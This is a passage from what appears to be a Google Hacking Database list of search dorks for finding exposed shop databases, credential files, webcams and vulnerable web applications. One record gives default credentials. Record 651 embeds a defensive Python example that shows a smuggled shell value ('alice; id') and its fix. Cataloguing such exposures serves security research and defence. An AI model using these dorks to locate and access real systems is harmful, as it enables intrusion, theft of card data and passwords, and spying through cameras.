[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][632]] [[start][633] [[title]inurl:changepassword.cgi -cvs[[title]] [[descr]Allows a user to change his/her password for authentication to the system. The script does not limit repeated failed attempts, which makes it vulnerable to brute force.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Achangepassword.cgi+-cvs&btnG=Search[url]] [[dork]inurl:changepassword.cgi -cvs[dork]] [end][633]] [[start][634] [[title]filetype:ini inurl:flashFXP.ini[[title]] [[descr]FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.

The flashFXP.ini file is its configuration file and may contain usernames, passwords and everything else needed to log in to the stored FTP sites.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][634]] [[start][635] [[title]inurl:shopdbtest.asp[[title]] [[descr]Shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers to view the database location, and since that is usually unprotected, the attacker can then download the web site's database by simply clicking on a URL (that displays the active database).

The page shopdbtest.asp is visible to all users and contains the full configuration information. An attacker can therefore download the MDB (Microsoft Access database file) and gain access to sensitive information about orders, users, passwords, etc.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][635]] [[start][636] [[title]"Powered by A-CART"[title]] [[descr] A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database.

A security vulnerability in the product allows remote attackers to download the product's database, thus gaining access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login password).

http://www.securityfocus.com/bid/5597 (search SF for more)[descr]] [[url]http://www.google.com/search?hl=es&q=%22Powered+by+A-CART%22+&meta=[url]] [[dork]"Powered by A-CART" [dork]] [end][636]] [[start][637] [[title]"Online Store - Powered by ProductCart"[title]] [[descr]ProductCart is "an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code.

http://www.securityfocus.com/bid/8105 (search SF for more)


[descr]] [[url]http://www.google.com/search?hl=es&q=%22Online+Store+-+Powered+by+ProductCart%22+&meta=[url]] [[dork]"Online Store - Powered by ProductCart" [dork]] [end][637]] [[start][638] [[title]"More Info about MetaCart Free"[title]] [[descr]MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (credit card numbers, names, surnames, addresses, e-mails, etc).

[descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%22More+Info+about+MetaCart+Free%22&btnG=Suche&meta=[url]] [[dork]"More Info about MetaCart Free"[dork]] [end][638]] [[start][639] [[title]inurl:midicart.mdb[[title]] [[descr]MIDICART is an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gaining access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name).[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Amidicart.mdb&btnG=Google-Suche&meta=[url]] [[dork]inurl:midicart.mdb[dork]] [end][639]] [[start][640] [[title]camera linksys inurl:main.cgi[[title]] [[descr]Another webcam, Linksys style.[descr]] [[url]http://www.google.com/search?q=camera+linksys+inurl%3Amain.cgi&start=0&start=0&ie=utf-8&oe=utf-8[url]] [[dork]camera linksys inurl:main.cgi[dork]] [end][640]] [[start][641] [[title]intitle:"MailMan Login"[title]] [[descr]MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation.
MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'.
[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22MailMan+Login%22+++&btnG=Suche&meta=[url]] [[dork]intitle:"MailMan Login" [dork]] [end][641]] [[start][642] [[title]intitle:"my webcamXP server!" inurl:":8080"[title]] [[descr]"my webcamXP server!"
Is there really an explanation needed?
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22my+webcamXP+server%21%22+inurl%3A%22%3A8080%22&btnG=Search[url]] [[dork]intitle:"my webcamXP server!" inurl:":8080"[dork]] [end][642]] [[start][643] [[title](inurl:webArch/mainFrame.cgi ) | (intitle:"web image monitor" -htm -solutions)[[title]] [[descr]The Ricoh Aficio 2035 (fax/scanner) web interface.
Attackers may read faxes and can get information like internal ip addresses.

cleanup by: yeseins & golfo
cleanup date: Apr 28, 2005
original dork: inurl:webArch/mainFrame.cgi
[descr]] [[url]http://www.google.com/search?num=20&q=%28inurl%3AwebArch%2FmainFrame.cgi+%29+%7C+%28intitle%3A%22web+image+monitor%22+-htm+-solutions%29[url]] [[dork](inurl:webArch/mainFrame.cgi ) | (intitle:"web image monitor" -htm -solutions)[dork]] [end][643]] [[start][644] [[title]"Powered by FUDforum"[title]] [[descr]FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system.

FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems.

http://www.securityfocus.com/bid/5501[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+FUDforum%22+&btnG=B%C3%BAsqueda&meta=[url]] [[dork]"Powered by FUDforum" [dork]] [end][644]] [[start][645] [[title]"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"[title]] [[descr]"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users."

There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.


[descr]] [[url]http://www.google.com/search?hl=en&q=%22BosDates+Calendar+System+%22+%22powered+by+BosDates+v3.2+by+BosDev%22&btnG=B%C3%BAsqueda&meta=[url]] [[dork]"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"[dork]] [end][645]] [[start][646] [[title]intitle:"Lotus Domino Go Webserver:" "Tuning your webserver" -site:ibm.com [[title]] [[descr]Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting.

With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain.
--From the Lotus Domino Go Webserver web page
[descr]] [[url]http://www.google.com/search?q=intitle:%22Lotus+Domino+Go+Webserver:%22+%22Tuning+your+webserver%22+-site:ibm.com&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"Lotus Domino Go Webserver:" "Tuning your webserver" -site:ibm.com[dork]] [end][646]] [[start][647] [[title]intitle:"IBM HTTP Server" "Use the Administration Server to configure"[title]] [[descr]Vendors page:

The foundation of any e-business application is the Web server. New IBM e-business software, such as the WebSphere family of products, is designed to operate with many popular Web servers. You do not need to change Web servers to take advantage of the latest IBM Web application technology.

IBM HTTP Server features include:
 
-Easy installation
-Support for SSL secure connections
-Fast Response Cache Accelerator
-IBM support as part of the WebSphere bundle
-Hardware crypto support
-Administration Server that helps to administer and configure IHS servers.
-Help information that uses the easy-to-navigate design that is common to all WebSphere products
-IBM HTTP Server runs on AIX, HP-UX, Linux, Solaris, Windows 2000 and Windows NT[descr]] [[url]http://www.google.com/search?q=intitle:%22IBM+HTTP+Server%22+%22Use+the+Administration+Server+to+configure%22&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"IBM HTTP Server" "Use the Administration Server to configure"[dork]] [end][647]] [[start][648] [[title]"Powered by Caudium Webserver" -caudium.net[[title]] [[descr]What is the Caudium WebServer?

Caudium is the name of a GPL-ed (free for commercial and personal use) web server written in Pike and in C. It is originally based on the Roxen Challenger 1.3 code base.
It is an attractive alternative to servers like Apache, Netscape® and Zeus® due to its strength in dynamic page and data generation, modularity and more.
The Caudium Project runs also an IRC network, has created a GPL webmail called CAMAS and has an ever-growing community of developers and users worldwide.

What are Caudium's Benefits?

Performance: Caudium is a non-forking monolithic web server. Most web servers, like Apache 1.3, fork processes to keep up with demand, creating a less scalable solution when a sudden burst of traffic hits your web site.
An optional multi-threaded mode further increases performance especially when dealing with dynamically generated pages.

[..]

Flexibility: You can write new tags and modules, easily extend Caudium using Pike or C and take advantage of the configuration interface.
Dynamic content can be generated with RXML, PHP or CGIs thus migration from other servers like Apache is very easy.

Platform independence: Caudium is shipped with Debian GNU/Linux and FreeBSD ports and runs on many other Unix-like systems (Any Linux®-based, OpenBSD, NetBSD, Solaris®, AIX®, Darwin/MacOS X®)
It is written in Pike and C.

[..]
[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+Caudium+Webserver%22+-caudium.net&meta=[url]] [[dork]"Powered by Caudium Webserver" -caudium.net[dork]] [end][648]] [[start][649] [[title]intitle:"Directory Listing, Index of /*/"[title]] [[descr]Vendor page (translated from the German):
"Simple HTTP server software for private homepage hosting or large uploads."


[descr]] [[url]http://www.google.com/search?q=intitle:%22Directory+Listing,+Index+of+/*/%22&hl=en&lr=&filter=0[url]] [[dork]intitle:"Directory Listing, Index of /*/"[dork]] [end][649]] [[start][650] [[title]intitle:"error 404" "From RFC 2068 "[title]] [[descr]The dork matches the default WebLogic 404 page, which quotes RFC 2068. WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapid assembly of composite services, transforming existing infrastructure to a service-oriented architecture in a manageable phased approach.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22error+404%22+%22From+RFC+2068+%22&btnG=Search[url]] [[dork]intitle:"error 404" "From RFC 2068 "[dork]] [end][650]] [[start][651] [[title]intitle:"Open WebMail" "Open WebMail version (2.20|2.21|2.30) "[title]] [[descr] "Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl.

Details
Vulnerable Systems:
* Open Webmail versions 2.20, 2.21 and 2.30
* Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below)

The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to an HTTP GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (e.g. the Apache user, "nobody" or "www").
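The bug pattern described above, shown as an added example in Python rather than in Open WebMail's own Perl (this is not the project's code; the tool path, its arguments and the login-name grammar are assumptions): the vulnerable string build, what a POSIX shell would make of it, and the fix that validates the value and passes it as a single argv element with no shell involved.

```python
"""Shell metacharacter injection of the userstat.pl kind, and its fix.

Added example, not Open WebMail's code: the tool path, its arguments and
the login-name grammar are assumptions. The bug is a loginname string
interpolated into a shell command line; ';', '|' and friends then start
new commands. The fix is to validate the value and hand it to the child
as one argv element, never through a shell.
"""
import re
import shlex
import subprocess
import sys

TOOL = "./openwebmail-tool.pl"          # assumed path; the real flags are omitted
SHELL_SEPARATORS = {";", "|", "||", "&", "&&"}
# Assumed grammar for a login name: a POSIX-style user name and nothing else.
LOGINNAME = re.compile(r"[a-z_][a-z0-9_.-]{0,31}")


def vulnerable_command(loginname):
    """The bug pattern: untrusted text interpolated into one shell string."""
    return f"{TOOL} {loginname}"


def shell_view(command):
    """Split a command line the way a POSIX shell would, into one argv list
    per simple command, cutting at ; | & and their doubled forms. Good enough
    for unquoted arguments; it is not a full shell grammar."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SHELL_SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def validate_loginname(loginname):
    """Allow-list check applied before the value goes anywhere near a process."""
    if not LOGINNAME.fullmatch(loginname):
        raise ValueError(f"refusing loginname {loginname!r}")
    return loginname


def safe_argv(loginname):
    """The fix: validated value as a single argv element, to be run with
    subprocess.run(argv) (shell=False), so no shell ever parses it."""
    return [TOOL, validate_loginname(loginname)]


def argv_passthrough(*args):
    """Demonstration helper: start a child with shell=False and return the
    argv it received, showing metacharacters arrive as plain data."""
    child = "import sys; print('\\x1f'.join(sys.argv[1:]))"
    proc = subprocess.run([sys.executable, "-c", child, *args],
                          capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n").split("\x1f")


def demo(payload="alice; id"):
    """Same payload through the vulnerable path, the shell's reading of it,
    and the hardened path."""
    try:
        safe_argv(payload)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_string": vulnerable_command(payload),
        "shell_runs": shell_view(vulnerable_command(payload)),
        "rejected_by_validation": rejected,
        "argv_as_data": argv_passthrough(payload),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the argv form alone already stops the shell from splitting the value; the allow-list is the second layer, because the tool itself may still interpret a leading "-" or an unexpected character in ways the web front end never intended.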

[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Open+WebMail%22+%22Open+WebMail+version+%282.20%7C2.21%7C2.30%29+%22&btnG=B%C3%BAsqueda&meta=[url]] [[dork]intitle:"Open WebMail" "Open WebMail version (2.20|2.21|2.30) "[dork]] [end][651]] [[start][652] [[title]intitle:"EMUMAIL - Login" "Powered by EMU Webmail"[title]] [[descr]The failure to strip script tags in emumail.cgi allows for cross-site scripting (XSS) attacks.

Vulnerable systems:
* EMU Webmail version 5.0
* EMU Webmail version 5.1.0

Depending on what functions you throw in there, you get certain contents of the emumail.cgi file.

http://www.securityfocus.com/bid/9861[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22EMUMAIL+-+Login%22+%22Powered+by+EMU+Webmail%22+++&btnG=Search[url]] [[dork]intitle:"EMUMAIL - Login" "Powered by EMU Webmail" [dork]] [end][652]] [[start][653] [[title]intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse[[title]] [[descr]WebJeff-Filemanager 1.x

DESCRIPTION:
A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files.

The problem is that the "index.php3" file doesn't verify the path to the requested file. Files can be read without authorisation.

http://www.securityfocus.com/bid/7995[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22WebJeff+-+FileManager%22+intext%3A%22login%22+intext%3APass%7CPAsse&btnG=Search[url]] [[dork]intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse[dork]] [end][653]] [[start][654] [[title]inurl:netw_tcp.shtml[[title]] [[descr]An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]

[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Anetw_tcp.shtml&btnG=B%C3%BAsqueda&meta=[url]] [[dork]inurl:netw_tcp.shtml[dork]] [end][654]] [[start][655] [[title]intitle:"Object not found!" intext:"Apache/2.0.* (Linux/SuSE)"[title]] [[descr]This one detects Apache 2.0.x web servers on SuSE Linux by their error page.
[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Object+not+found%21%22+intext%3A%22Apache%2F2.0.*+%28Linux%2FSuSE%29%22&btnG=B%FAsqueda&meta=[url]] [[dork]intitle:"Object not found!" intext:"Apache/2.0.* (Linux/SuSE)"[dork]] [end][655]] [[start][656] [[title]inurl:"messageboard/Forum.asp?"[title]] [[descr]Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection and cross-site scripting attacks.

http://www.securityfocus.com/bid/11361[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3A%22messageboard%2FForum.asp%3F%22&btnG=Search[url]] [[dork]inurl:"messageboard/Forum.asp?"[dork]] [end][656]] [[start][657] [[title]intitle:"Directory Listing" "tree view"[title]] [[descr]Dirlist is an ASP script that lists folders in an Explorer-style view:

* Tree
* Detailed
* Tiled

Quote:

*Lists files and directories in either a Tree, Detailed, or Tiled view.
*Can set a "Starting Directory". This can be a IIS Virtual Directory path.
*Displays file and directory properties.
*Can specify directories which you do not want to display and access.
*Can specify directories which you only want to display and access.
*Can specify what file-types to only display.
*Displays custom file-type icons. This can be turned off in the settings.
* 'Detailed' and 'Tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings.
[descr]] [[url]http://www.google.com/search?q=intitle:%22Directory+Listing%22+%22tree+view%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0[url]] [[dork]intitle:"Directory Listing" "tree view"[dork]] [end][657]] [[start][658] [[title]inurl:default.asp intitle:"WebCommander"[title]] [[descr]Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Adefault.asp+intitle%3A%22WebCommander%22+&btnG=Search[url]] [[dork]inurl:default.asp intitle:"WebCommander" [dork]] [end][658]] [[start][659] [[title]intitle:"Philex 0.2*" -script -site:freelists.org[[title]] [[descr]Philex (phile 'file' explorer) is a PHP-based web file manager.

What Philex can do:
- easy navigation with tree structure
- create, delete, rename, copy and move folders/files.
- download files (normal or compressed :zip, gz, bz ).
- download many files as one compressed file.
- send files by email.
- upload local files to server [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22Philex+0.2*%22+-script+-site%3Afreelists.org&btnG=Search[url]] [[dork]intitle:"Philex 0.2*" -script -site:freelists.org[dork]] [end][659]] [[start][660] [[title]intitle:mywebftp "Please enter your password"[title]] [[descr]MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easily customizable.
[descr]] [[url]http://www.google.com/search?q=intitle:mywebftp+%22Please+enter+your+password%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0[url]] [[dork]intitle:mywebftp "Please enter your password"[dork]] [end][660]] [[start][661] [[title]"1999-2004 FuseTalk Inc" -site:fusetalk.com[[title]] [[descr]Fusetalk forums (v4) are susceptible to cross-site scripting attacks that can be exploited by passing an img src with malicious javascript. [descr]] [[url]http://www.google.com/search?hl=en&lr=&q=%221999-2004+FuseTalk+Inc%22+-site%3Afusetalk.com&btnG=Search[url]] [[dork]"1999-2004 FuseTalk Inc" -site:fusetalk.com[dork]] [end][661]] [[start][662] [[title]"2003 DUware All Rights Reserved"[title]] [[descr] Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account.

DUclassmate may allow unauthorized remote attackers to gain access to a computer.

DUclassified is reported prone to multiple SQL injection vulnerabilities.

SQL injection issues also affect DUforum.

DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities.[descr]] [[url]http://www.google.com/search?q=%222003+DUware+All+Rights+Reserved%22&hl=en&lr=&filter=0[url]] [[dork]"2003 DUware All Rights Reserved"[dork]] [end][662]] [[start][663] [[title]"WebExplorer Server - Login" "Welcome to WebExplorer Server"[title]] [[descr]WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people.[descr]] [[url]http://www.google.com/search?hl=en&q=%22WebExplorer+Server+-+Login%22+%22Welcome+to+WebExplorer+Server%22&btnG=B%C3%BAsqueda&meta=[url]] [[dork]"WebExplorer Server - Login" "Welcome to WebExplorer Server"[dork]] [end][663]] [[start][664] [[title]intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"[title]] [[descr]ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22ASP+Stats+Generator+*.*%22+%22ASP+Stats+Generator%22+%222003-2004+weppos%22&btnG=B%FAsqueda&meta=[url]] [[dork]intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"[dork]] [end][664]] [[start][665] [[title]"Installed Objects Scanner" inurl:default.asp[[title]] [[descr] Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components.

Just place the script on your server and view it in your browser to check your server for all currently known components.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Installed+Objects+Scanner%22+inurl%3Adefault.asp++&btnG=Search[url]] [[dork]"Installed Objects Scanner" inurl:default.asp [dork]] [end][665]] [[start][666] [[title] intitle:"remote assessment" OpenAanval Console[[title]] [[descr]The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management.

[descr]] [[url]http://www.google.com/search?q=%0Aintitle%3A%22remote+assessment%22+OpenAanval+Console[url]] [[dork] intitle:"remote assessment" OpenAanval Console[dork]] [end][666]] [[start][667] [[title]ext:ini intext:env.ini[[title]] [[descr]This one shows configuration files for various applications. Based on the application, an attacker may find information like passwords, IP addresses and more.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=ext%3Aini+intext%3Aenv.ini&btnG=Search[url]] [[dork]ext:ini intext:env.ini[dork]] [end][667]] [[start][668] [[title]ezBOO "Administrator Panel" -cvs[[title]] [[descr]ezBOO WebStats is a high level statistical tool for web sites monitoring.
It allows real time access monitoring on several sites.
Based on php and mySQL it is easy to install and customization is made easy.
It works on Unix, Linux and Windows[descr]] [[url]http://www.google.com/search?q=ezBOO+%22%3E%3E+Administrator+Panel+%3C%3C%22+-cvs&hl=en&lr=&start=10&sa=N[url]] [[dork]ezBOO ">> Administrator Panel <<" -cvs[dork]] [end][668]] [[start][669] [[title]"This page has been automatically generated by Plesk Server Administrator"[title]] [[descr]Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.

Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code.

This is achievable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username.

http://www.securityfocus.com/bid/3737


[descr]] [[url]http://www.google.com/search?hl=en&q=%22This+page+has+been+automatically+generated+by+Plesk+Server+Administrator%22&btnG=B%C3%BAsqueda&meta=[url]] [[dork]"This page has been automatically generated by Plesk Server Administrator"[dork]] [end][669]] [[start][670] [[title]"The script whose uid is " "is not allowed to access"[title]] [[descr]This PHP error message is revealing the webserver's directory and user ID.

[descr]] [[url]http://www.google.com/search?q=%22The+script+whose+uid+is+%22+%22is+not+allowed+to+access%22&btnG=Search&hl=en&lr=&client=firefox-a[url]] [[dork]"The script whose uid is " "is not allowed to access"[dork]] [end][670]] [[start][671] [[title]filetype:php inurl:nqt intext:"Network Query Tool"[title]] [[descr]Network Query Tool enables any Internet user to scan network information using:

* Resolve/Reverse Lookup
* Get DNS Records
* Whois (Web)
* Whois (IP owner)
* Check port (!!!)
* Ping host
* Traceroute to host
* Do it all

The author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.

A smart programmer could use the port scan feature and probe all the ports nmap knows as services. This would be slow, but it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.

It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.

PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Aphp+inurl%3Anqt+intext%3A%22Network+Query+Tool%22+&btnG=Search[url]] [[dork]filetype:php inurl:nqt intext:"Network Query Tool" [dork]] [end][671]] [[start][672] [[title]inurl:TiVoConnect?Command=QueryServer[[title]] [[descr]TiVo is the digital replacement for your analog video recorder. It's a digital media system that amongst other things allows recording TV shows to a hard disk. More information is available at http://www.tivo.com.

This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:

1.0
Sat Oct 16 15:26:46 EDT 2004
JavaHMO
1.0
Leon Nicholls
-
This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792

In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms).[descr]] [[url]http://www.google.com/search?q=inurl%3ATiVoConnect%3FCommand%3DQueryServer[url]] [[dork]inurl:TiVoConnect?Command=QueryServer[dork]] [end][672]] [[start][673] [[title]ext:mdb inurl:*.mdb inurl:fpdb shop.mdb[[title]] [[descr]The directory "http:/xxx/fpdb/" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.

One of them is MetaCart, which uses "shop.mdb" as its default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpg

Three results only at time of writing. Remove the shop.mdb part to see the complete list of databases.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=ext%3Amdb+inurl%3A*.mdb++inurl%3Afpdb+shop[url]] [[dork]ext:mdb inurl:*.mdb inurl:fpdb shop[dork]] [end][673]] [[start][674] [[title]inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"[title]] [[descr]Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3Acgi-bin%2Ftestcgi.exe+%22Please+distribute+TestCGI%22[url]] [[dork]inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"[dork]] [end][674]] [[start][675] [[title]inurl:ttt-webmaster.php[[title]] [[descr]Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.

Vulnerability report: http://www.securityfocus.com/bid/11358
Vendor site: http://www.turbotraffictrader.com/php

[descr]] [[url]http://www.google.com/search?q=inurl:ttt-webmaster.php&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]inurl:ttt-webmaster.php[dork]] [end][675]] [[start][676] [[title]intitle:"DVR Web client"[title]] [[descr]This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.

* Four Channel Input
* Horizontal Resolution 480 Lines
* 16.7 Million Color Output
* Display In Quad or Single Image (Full MultiPlex)
* Motion Detection
* Scheduling
* Zoom in Live and Playback
* 720H X 480V (Full) 360H X 240V In Quad
* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)
* Web Interface TCP/IP With Client Software
* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software
* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc. [descr]] [[url]http://www.google.com/search?q=intitle:%22DVR+Web+client%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0[url]] [[dork]intitle:"DVR Web client"[dork]] [end][676]] [[start][677] [[title]intitle:"ASP FileMan" Resend -site:iisworks.com[[title]] [[descr]FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database.

Default user: user=admin, pass=pass

In the default installation a diagnostics page called diags.asp exists. The manual recommends deleting it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.

Site admins have been notified. As always: DO NOT ABUSE THIS.[descr]] [[url]http://www.google.com/search?q=intitle:%22ASP+FileMan%22+Resend+-site:iisworks.com&num=100&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&filter=0[url]] [[dork]intitle:"ASP FileMan" Resend -site:iisworks.com[dork]] [end][677]] [[start][678] [[title]intitle:"index.of *" admin news.asp configview.asp[[title]] [[descr]With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.

When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file ‘news.mdb’.

For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.

The database contains the plain text password.

PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22index.of+*%22+admin+news.asp+configview.asp&btnG=Search[url]] [[dork]intitle:"index.of *" admin news.asp configview.asp[dork]] [end][678]] [[start][679] [[title]"Copyright © 2002 Agustin Dondo Scripts"[title]] [[descr]CoolPHP has multiple vulnerabilities:

* Cross-Site Scripting vulnerability (index.php)
* A Path Disclosure Vulnerability (index.php)
* Local file include Vulnerability with Directory Traversal

info: http://www.securityfocus.com/archive/1/378617

